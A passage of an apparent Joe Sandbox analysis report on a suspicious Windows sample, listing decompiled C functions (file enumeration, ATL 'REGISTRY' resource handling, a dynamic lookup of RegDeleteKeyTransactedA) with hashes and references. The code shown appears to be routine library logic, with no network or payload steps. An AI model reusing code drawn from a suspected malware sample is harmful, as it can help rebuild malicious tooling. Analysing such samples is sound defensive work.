														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E00EAA01F(_t244 - _t287 + 1, _t287,  &_v676, E00EAA533(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E00EA9F50( &(_v608.cFileName),  &_v640,  &_v609, E00EAA533(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E00EA8B82(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E00EA8B82(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E00EACB90(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E00EA9E84);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E00EA8B82(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E00EA403C(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E00EA8B82(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E00EAD080(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E00EA8B82( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E00EA8B82(_t283);
						goto L31;
					}
				} else {
					_t219 = E00EA75D4(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E00EA748C();
					L31:
					return _t297;
				}
				L81:
			}

0x00eaa041
0x00eaa044
0x00eaa047
0x00eaa048
0x00eaa04a
0x00eaa060
0x00eaa064
0x00eaa067
0x00eaa069
0x00eaa06b
0x00eaa06d
0x00eaa06f
0x00eaa072
0x00eaa075
0x00eaa078
0x00eaa07a
0x00eaa0dd
0x00eaa0df
0x00eaa0e2
0x00eaa0e4
0x00eaa0e8
0x00eaa0f1
0x00eaa0f2
0x00eaa0f5
0x00eaa0f7
0x00eaa0fa
0x00eaa0fe
0x00eaa0fe
0x00eaa100
0x00eaa102
0x00eaa104
0x00eaa106
0x00eaa106
0x00eaa108
0x00eaa10b
0x00eaa10e
0x00eaa10e
0x00eaa110
0x00eaa111
0x00eaa111
0x00eaa11c
0x00eaa11e
0x00eaa121
0x00eaa122
0x00eaa125
0x00eaa125
0x00eaa129
0x00eaa12c
0x00eaa12f
0x00eaa12f
0x00eaa12f
0x00eaa13c
0x00eaa13e
0x00eaa141
0x00eaa143
0x00eaa15b
0x00eaa15e
0x00eaa161
0x00eaa163
0x00eaa166
0x00eaa168
0x00eaa16b
0x00eaa16e
0x00eaa1cb
0x00eaa1ce
0x00eaa1d1
0x00eaa1d3
0x00000000
0x00eaa170
0x00eaa172
0x00eaa172
0x00eaa174
0x00eaa177
0x00eaa177
0x00eaa179
0x00eaa17b
0x00eaa181
0x00eaa184
0x00eaa184
0x00eaa186
0x00eaa187
0x00eaa187
0x00eaa18e
0x00eaa191
0x00eaa195
0x00eaa1a2
0x00eaa1a7
0x00eaa1aa
0x00eaa1ac
0x00eaa220
0x00eaa221
0x00eaa222
0x00eaa223
0x00eaa224
0x00eaa225
0x00eaa22a
0x00eaa22e
0x00eaa230
0x00eaa231
0x00eaa234
0x00eaa234
0x00eaa237
0x00eaa237
0x00eaa239
0x00eaa23a
0x00eaa23a
0x00eaa23e
0x00eaa23f
0x00eaa246
0x00eaa249
0x00eaa24c
0x00eaa24e
0x00eaa256
0x00eaa257
0x00eaa258
0x00eaa25b
0x00eaa265
0x00eaa269
0x00eaa26b
0x00eaa27f
0x00eaa27f
0x00eaa282
0x00eaa28c
0x00eaa291
0x00eaa294
0x00eaa296
0x00000000
0x00eaa298
0x00eaa298
0x00eaa29d
0x00eaa2a4
0x00eaa2a7
0x00eaa2a9
0x00eaa2ba
0x00eaa2bc
0x00eaa2be
0x00eaa2be
0x00eaa2be
0x00eaa2ab
0x00eaa2ac
0x00eaa2b1
0x00eaa2b4
0x00eaa2c3
0x00eaa2c9
0x00000000
0x00eaa2cc
0x00eaa26d
0x00eaa26d
0x00eaa273
0x00eaa278
0x00eaa27b
0x00eaa27d
0x00eaa2cf
0x00eaa2d1
0x00eaa2d2
0x00eaa2d3
0x00eaa2d4
0x00eaa2d5
0x00eaa2d6
0x00eaa2db
0x00eaa2de
0x00eaa2df
0x00eaa2e1
0x00eaa2e7
0x00eaa2ee
0x00eaa2f1
0x00eaa2f4
0x00eaa2f7
0x00eaa2f8
0x00eaa2f9
0x00eaa2fc
0x00eaa302
0x00eaa304
0x00eaa306
0x00eaa306
0x00eaa308
0x00eaa30a
0x00000000
0x00000000
0x00eaa30c
0x00eaa30e
0x00eaa310
0x00eaa312
0x00eaa31d
0x00eaa31f
0x00eaa321
0x00000000
0x00000000
0x00eaa321
0x00eaa312
0x00000000
0x00eaa30e
0x00eaa323
0x00eaa323
0x00eaa329
0x00eaa32b
0x00eaa331
0x00eaa333
0x00eaa355
0x00eaa355
0x00eaa357
0x00eaa359
0x00eaa365
0x00eaa365
0x00eaa35b
0x00eaa35b
0x00eaa35d
0x00000000
0x00eaa35f
0x00eaa35f
0x00eaa361
0x00eaa363
0x00000000
0x00000000
0x00eaa363
0x00eaa35d
0x00eaa36d
0x00eaa375
0x00eaa37b
0x00eaa37c
0x00eaa37e
0x00eaa386
0x00eaa38c
0x00eaa392
0x00eaa398
0x00eaa3ac
0x00eaa3b1
0x00eaa3bc
0x00eaa3cc
0x00eaa3d2
0x00eaa3d4
0x00eaa3d7
0x00eaa3fa
0x00eaa3fa
0x00eaa3ff
0x00eaa405
0x00eaa405
0x00eaa40b
0x00eaa411
0x00eaa417
0x00eaa41d
0x00eaa423
0x00eaa444
0x00eaa449
0x00eaa44e
0x00eaa452
0x00eaa458
0x00eaa45b
0x00eaa46e
0x00eaa46e
0x00eaa474
0x00eaa47a
0x00eaa47b
0x00eaa47c
0x00eaa481
0x00eaa484
0x00eaa48a
0x00eaa48c
0x00eaa4ea
0x00eaa4f0
0x00eaa4f8
0x00eaa4fd
0x00eaa503
0x00eaa504
0x00000000
0x00000000
0x00000000
0x00eaa45d
0x00eaa45d
0x00eaa460
0x00eaa462
0x00000000
0x00eaa464
0x00eaa464
0x00eaa467
0x00000000
0x00eaa469
0x00eaa469
0x00eaa46c
0x00000000
0x00000000
0x00000000
0x00000000
0x00eaa46c
0x00eaa467
0x00eaa462
0x00eaa506
0x00eaa507
0x00000000
0x00eaa48e
0x00eaa48e
0x00eaa494
0x00eaa49c
0x00eaa4a1
0x00eaa4b0
0x00eaa4b0
0x00eaa4b8
0x00eaa4be
0x00eaa4c4
0x00eaa4cb
0x00eaa4ce
0x00eaa4d0
0x00eaa4e0
0x00eaa4e5
0x00000000
0x00eaa3d9
0x00eaa3d9
0x00eaa3df
0x00eaa3e0
0x00eaa3e1
0x00eaa3e2
0x00eaa3ea
0x00eaa3ea
0x00eaa50d
0x00eaa50d
0x00eaa514
0x00eaa515
0x00eaa51d
0x00eaa522
0x00eaa523
0x00eaa335
0x00eaa335
0x00eaa338
0x00eaa33a
0x00eaa34f
0x00000000
0x00eaa33c
0x00eaa33c
0x00eaa33f
0x00eaa340
0x00eaa341
0x00eaa342
0x00eaa347
0x00eaa33a
0x00eaa528
0x00eaa529
0x00eaa52b
0x00eaa532
0x00000000
0x00000000
0x00000000
0x00eaa27d
0x00eaa250
0x00eaa252
0x00eaa253
0x00eaa255
0x00eaa255
0x00000000
0x00000000
0x00000000
0x00000000
0x00eaa1ae
0x00eaa1ae
0x00eaa1b4
0x00eaa1b7
0x00eaa1ba
0x00eaa1bd
0x00eaa1c0
0x00eaa1c3
0x00eaa1c6
0x00eaa1c6
0x00000000
0x00eaa177
0x00eaa145
0x00eaa145
0x00eaa148
0x00eaa1d5
0x00eaa1d6
0x00eaa1db
0x00000000
0x00eaa1db
0x00eaa07c
0x00eaa07c
0x00eaa07f
0x00eaa087
0x00eaa08a
0x00eaa091
0x00eaa093
0x00eaa095
0x00eaa0b0
0x00eaa0b1
0x00eaa0b2
0x00eaa0b3
0x00eaa0b8
0x00eaa0bb
0x00eaa0be
0x00eaa097
0x00eaa097
0x00eaa09a
0x00eaa09b
0x00eaa09c
0x00eaa09d
0x00eaa09e
0x00eaa0a3
0x00eaa0a5
0x00eaa0a8
0x00eaa0a8
0x00eaa0c0
0x00eaa0c2
0x00000000
0x00000000
0x00eaa0cb
0x00eaa0ce
0x00eaa0d1
0x00eaa0d3
0x00eaa0d5
0x00000000
0x00eaa0d7
0x00eaa0d7
0x00eaa0da
0x00000000
0x00eaa0da
0x00000000
0x00eaa0d5
0x00eaa150
0x00eaa1dc
0x00eaa1df
0x00eaa1e3
0x00eaa1ec
0x00eaa1ef
0x00eaa1f3
0x00eaa1f3
0x00eaa1f5
0x00eaa1f8
0x00eaa1fa
0x00eaa1fc
0x00eaa1fe
0x00eaa203
0x00eaa204
0x00eaa208
0x00eaa208
0x00eaa20c
0x00eaa20f
0x00eaa20f
0x00eaa213
0x00000000
0x00eaa21a
0x00eaa04c
0x00eaa04c
0x00eaa053
0x00eaa054
0x00eaa056
0x00eaa21b
0x00eaa21f
0x00eaa21f
0x00000000

APIs

_free.LIBCMT ref: 00EAA1D6

Strings

*?, xrefs: 00EAA07F

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 0ca23289a21784777a574ee5e7f0836160660e8685b7c3789ef03d27af64651c
Instruction ID: 0e13b6450b9c8b8398f2d85681f5188c568627783404170661a8173f555d74be
Opcode Fuzzy Hash: 0ca23289a21784777a574ee5e7f0836160660e8685b7c3789ef03d27af64651c
Instruction Fuzzy Hash: C36118B5E00219AFCB14CFA8C8815EDBBF5AF5D314F28916AE855BB300D731AE41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EA2049 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00EA2049(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr* __edi, void* __esi, void* __eflags) {
				void* _t27;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t44;
				void* _t45;
				intOrPtr* _t64;
				void* _t65;
				void* _t66;
				void* _t68;
				void* _t69;

				_t62 = __edi;
				_push(0x14);
				E00EB0216(0xeb07c7, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t65 - 0x1c)) = __edx;
				 *((intOrPtr*)(_t65 - 0x20)) = __ecx;
				_t64 = 0;
				 *((intOrPtr*)(_t65 - 0x18)) = 0;
				 *(_t65 - 4) =  *(_t65 - 4) & 0;
				_t43 =  *((intOrPtr*)(_t65 + 8));
				if( *((intOrPtr*)(_t65 + 8)) == 0) {
					_t44 = 0x80070057;
				} else {
					_t26 = E00EA75E7(_t43) + 1;
					 *((intOrPtr*)(_t65 - 0x14)) = E00EA75E7(_t43) + 1;
					_t27 = E00EA1181(_t65 - 0x14, _t26);
					_t68 = _t66 + 4;
					if(_t27 >= 0) {
						_t62 =  *((intOrPtr*)(_t65 - 0x14));
						__eflags =  *((intOrPtr*)(_t65 - 0x14)) - 0x400;
						if(__eflags > 0) {
							L6:
							_t28 = E00EA3CD7(_t65 - 0x18, _t64, _t62);
							_t64 =  *((intOrPtr*)(_t65 - 0x18));
						} else {
							_t39 = E00EA11AE(_t43, _t62, _t62, 0, __eflags);
							__eflags = _t39;
							if(_t39 == 0) {
								goto L6;
							} else {
								E00EB02F0(_t62);
								_t28 = _t68;
							}
						}
						_t45 = E00EA1251(_t28, _t43, _t62, 3);
					} else {
						_t45 = 0;
					}
					_t31 = E00EA75E7(L"REGISTRY") + 1;
					 *((intOrPtr*)(_t65 - 0x14)) = E00EA75E7(L"REGISTRY") + 1;
					_t32 = E00EA1181(_t65 - 0x14, _t31);
					_t69 = _t68 + 4;
					if(_t32 >= 0) {
						_t62 =  *((intOrPtr*)(_t65 - 0x14));
						__eflags =  *((intOrPtr*)(_t65 - 0x14)) - 0x400;
						if(__eflags > 0) {
							L13:
							_t33 = E00EA3CD7(_t65 - 0x18, _t64, _t62);
							_t64 =  *((intOrPtr*)(_t65 - 0x18));
						} else {
							_t36 = E00EA11AE(_t45, _t62, _t62, _t64, __eflags);
							__eflags = _t36;
							if(_t36 == 0) {
								goto L13;
							} else {
								E00EB02F0(_t62);
								_t33 = _t69;
							}
						}
						_t34 = E00EA1251(_t33, L"REGISTRY", _t62, 3);
					} else {
						_t34 = 0;
					}
					if(_t45 == 0) {
						L18:
						_t44 = 0x8007000e;
					} else {
						_t75 = _t34;
						if(_t34 == 0) {
							goto L18;
						} else {
							_t44 = E00EA1B39(_t45,  *((intOrPtr*)(_t65 - 0x20)), _t62, _t64, _t75,  *((intOrPtr*)(_t65 - 0x1c)), _t45, _t34, 0);
						}
					}
				}
				if(_t64 != 0) {
					do {
						_t62 =  *_t64;
						_t64 = _t62;
						E00EA7188(_t64);
					} while (_t62 != 0);
				}
				return E00EB01C5(_t44, _t62, _t64);
			}

0x00ea2049
0x00ea2049
0x00ea2050
0x00ea2055
0x00ea2058
0x00ea205b
0x00ea205d
0x00ea2060
0x00ea2063
0x00ea2068
0x00ea2149
0x00ea206e
0x00ea2074
0x00ea207a
0x00ea207d
0x00ea2082
0x00ea2087
0x00ea208d
0x00ea2090
0x00ea2096
0x00ea20ae
0x00ea20b2
0x00ea20b7
0x00ea2098
0x00ea209a
0x00ea209f
0x00ea20a1
0x00000000
0x00ea20a3
0x00ea20a5
0x00ea20aa
0x00ea20aa
0x00ea20a1
0x00ea20c6
0x00ea2089
0x00ea2089
0x00ea2089
0x00ea20d2
0x00ea20d8
0x00ea20db
0x00ea20e0
0x00ea20e5
0x00ea20eb
0x00ea20ee
0x00ea20f4
0x00ea210c
0x00ea2110
0x00ea2115
0x00ea20f6
0x00ea20f8
0x00ea20fd
0x00ea20ff
0x00000000
0x00ea2101
0x00ea2103
0x00ea2108
0x00ea2108
0x00ea20ff
0x00ea2122
0x00ea20e7
0x00ea20e7
0x00ea20e7
0x00ea2129
0x00ea2142
0x00ea2142
0x00ea212b
0x00ea212b
0x00ea212d
0x00000000
0x00ea212f
0x00ea213e
0x00ea213e
0x00ea212d
0x00ea2129
0x00ea2150
0x00ea2152
0x00ea2152
0x00ea2155
0x00ea2157
0x00ea215d
0x00ea2152
0x00ea216b

APIs

__EH_prolog3_GS.LIBCMT ref: 00EA2050
__alloca_probe_16.LIBCMT ref: 00EA20A5

Part of subcall function 00EA11AE: __alloca_probe_16.LIBCMT ref: 00EA11D1

__alloca_probe_16.LIBCMT ref: 00EA2103

Strings

REGISTRY, xrefs: 00EA20C8, 00EA211B

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: __alloca_probe_16$H_prolog3_
String ID: REGISTRY
API String ID: 2219512784-194740550
Opcode ID: 2f8fc02320a30a935efe5789a01dfe331b36eb3fbe9ed042fb3da536ca9ffd2e
Instruction ID: 3b2f207a6fd1e8d6c473294667902c8b3d026164229732f505bb2a67498519b3
Opcode Fuzzy Hash: 2f8fc02320a30a935efe5789a01dfe331b36eb3fbe9ed042fb3da536ca9ffd2e
Instruction Fuzzy Hash: 1631AA71F011155BDF10AAA8CC826FF72E65FAE714F14602DEB06BF252EA34BD018791

Uniqueness

Uniqueness Score: -1.00%

Function 00EA1E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00EA1E71(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t28;
				void* _t29;
				void* _t33;
				void* _t35;
				void* _t40;
				void* _t44;
				intOrPtr* _t46;
				intOrPtr* _t64;
				intOrPtr _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;
				void* _t71;
				void* _t72;

				_push(0x14);
				E00EB0216(0xeb07c7, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t68 - 0x1c)) = __edx;
				 *((intOrPtr*)(_t68 - 0x20)) = __ecx;
				_t64 = 0;
				_t67 = 0;
				 *((intOrPtr*)(_t68 - 0x18)) = 0;
				 *((intOrPtr*)(_t68 - 4)) = 0;
				if( *((intOrPtr*)(_t68 + 8)) == 0) {
					_t44 = 0x80070057;
				} else {
					_t27 = E00EA75E7( *((intOrPtr*)(_t68 + 8))) + 1;
					 *((intOrPtr*)(_t68 - 0x14)) = E00EA75E7( *((intOrPtr*)(_t68 + 8))) + 1;
					_t28 = E00EA1181(_t68 - 0x14, _t27);
					_t71 = _t69 + 4;
					if(_t28 >= 0) {
						_t45 =  *((intOrPtr*)(_t68 - 0x14));
						__eflags =  *((intOrPtr*)(_t68 - 0x14)) - 0x400;
						if(__eflags > 0) {
							L6:
							_t29 = E00EA3CD7(_t68 - 0x18, _t67, _t45);
							_t67 =  *((intOrPtr*)(_t68 - 0x18));
						} else {
							_t40 = E00EA11AE(_t45, _t45, 0, 0, __eflags);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L6;
							} else {
								E00EB02F0(_t45);
								_t29 = _t71;
							}
						}
						_t46 = E00EA1251(_t29,  *((intOrPtr*)(_t68 + 8)), _t45, 3);
					} else {
						_t46 = 0;
					}
					_t32 = E00EA75E7(L"REGISTRY") + 1;
					 *((intOrPtr*)(_t68 - 0x14)) = E00EA75E7(L"REGISTRY") + 1;
					_t33 = E00EA1181(_t68 - 0x14, _t32);
					_t72 = _t71 + 4;
					if(_t33 >= 0) {
						_t65 =  *((intOrPtr*)(_t68 - 0x14));
						_t77 = _t65 - 0x400;
						if(_t65 > 0x400 || E00EA11AE(_t46, _t65, _t65, _t67, _t77) == 0) {
							_t35 = E00EA3CD7(_t68 - 0x18, _t67, _t65);
							_t67 =  *((intOrPtr*)(_t68 - 0x18));
						} else {
							E00EB02F0(_t65);
							_t35 = _t72;
						}
						_t64 = E00EA1251(_t35, L"REGISTRY", _t65, 3);
					}
					if(_t46 == 0) {
						L17:
						_t44 = 0x8007000e;
					} else {
						_t80 = _t64;
						if(_t64 == 0) {
							goto L17;
						} else {
							_t44 = E00EA1B39(_t46,  *((intOrPtr*)(_t68 - 0x20)), _t64, _t67, _t80,  *((intOrPtr*)(_t68 - 0x1c)), _t46, _t64, 1);
						}
					}
				}
				if(_t67 != 0) {
					do {
						_t64 =  *_t67;
						_t67 = _t64;
						E00EA7188(_t67);
					} while (_t64 != 0);
				}
				return E00EB01C5(_t44, _t64, _t67);
			}

0x00ea1e71
0x00ea1e78
0x00ea1e7d
0x00ea1e80
0x00ea1e83
0x00ea1e85
0x00ea1e87
0x00ea1e8a
0x00ea1e90
0x00ea1f72
0x00ea1e96
0x00ea1e9e
0x00ea1ea4
0x00ea1ea7
0x00ea1eac
0x00ea1eb1
0x00ea1eb7
0x00ea1eba
0x00ea1ec0
0x00ea1ed8
0x00ea1edc
0x00ea1ee1
0x00ea1ec2
0x00ea1ec4
0x00ea1ec9
0x00ea1ecb
0x00000000
0x00ea1ecd
0x00ea1ecf
0x00ea1ed4
0x00ea1ed4
0x00ea1ecb
0x00ea1ef1
0x00ea1eb3
0x00ea1eb3
0x00ea1eb3
0x00ea1efd
0x00ea1f03
0x00ea1f06
0x00ea1f0b
0x00ea1f10
0x00ea1f12
0x00ea1f15
0x00ea1f1b
0x00ea1f37
0x00ea1f3c
0x00ea1f28
0x00ea1f2a
0x00ea1f2f
0x00ea1f2f
0x00ea1f4e
0x00ea1f4e
0x00ea1f52
0x00ea1f6b
0x00ea1f6b
0x00ea1f54
0x00ea1f54
0x00ea1f56
0x00000000
0x00ea1f58
0x00ea1f67
0x00ea1f67
0x00ea1f56
0x00ea1f52
0x00ea1f79
0x00ea1f7b
0x00ea1f7b
0x00ea1f7e
0x00ea1f80
0x00ea1f86
0x00ea1f7b
0x00ea1f94

APIs

__EH_prolog3_GS.LIBCMT ref: 00EA1E78
__alloca_probe_16.LIBCMT ref: 00EA1ECF
__alloca_probe_16.LIBCMT ref: 00EA1F2A

Strings

REGISTRY, xrefs: 00EA1EF3, 00EA1F42

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: __alloca_probe_16$H_prolog3_
String ID: REGISTRY
API String ID: 2219512784-194740550
Opcode ID: e580853d6a8a737f4302880e40aa6a02a8396767271fea174a1d8435eefda8fd
Instruction ID: 64019794cbf3bfe4a3b13366f516c99a87e6ee3e2284e0288d44e759500bfa57
Opcode Fuzzy Hash: e580853d6a8a737f4302880e40aa6a02a8396767271fea174a1d8435eefda8fd
Instruction Fuzzy Hash: 5A319435F002559BCB10EAA4CC82AFF72B5AF9E354F1460A5F906BF252EB74BD018791

Uniqueness

Uniqueness Score: -1.00%

Function 00EA13BB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E00EA13BB(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t8;
				intOrPtr* _t12;

				_t12 = __ecx;
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						L6:
						return 1;
					}
					return RegDeleteKeyA();
				}
				_t7 = GetModuleHandleA("Advapi32.dll");
				if(_t7 == 0) {
					goto L6;
				}
				_t8 = GetProcAddress(_t7, "RegDeleteKeyTransactedA");
				if(_t8 == 0) {
					goto L6;
				}
				return  *_t8(_a4, _a8, 0, 0,  *_t12, 0);
			}

0x00ea13bf
0x00ea13c6
0x00ea13f9
0x00ea1404
0x00000000
0x00ea1406
0x00ea13fe
0x00ea13fe
0x00ea13cd
0x00ea13d5
0x00000000
0x00000000
0x00ea13dd
0x00ea13e5
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00EA13CD
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 00EA13DD

Strings

RegDeleteKeyTransactedA, xrefs: 00EA13D7
Advapi32.dll, xrefs: 00EA13C8

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyTransactedA
API String ID: 1646373207-1972538232
Opcode ID: 2b6e3ab523ad0ff5943ee38a6e0773f593f5254d3f27fa851445c977749687b3
Instruction ID: 522d9dc0da52e7e6fada555d1b10211dcbbf568dd27ad261d8f14e89b332a368
Opcode Fuzzy Hash: 2b6e3ab523ad0ff5943ee38a6e0773f593f5254d3f27fa851445c977749687b3
Instruction Fuzzy Hash: 03F08232210204BA97211FABAC08DA7B7ACEBCAB77B4590BEF591E5010D631A856C660

Uniqueness

Uniqueness Score: -1.00%

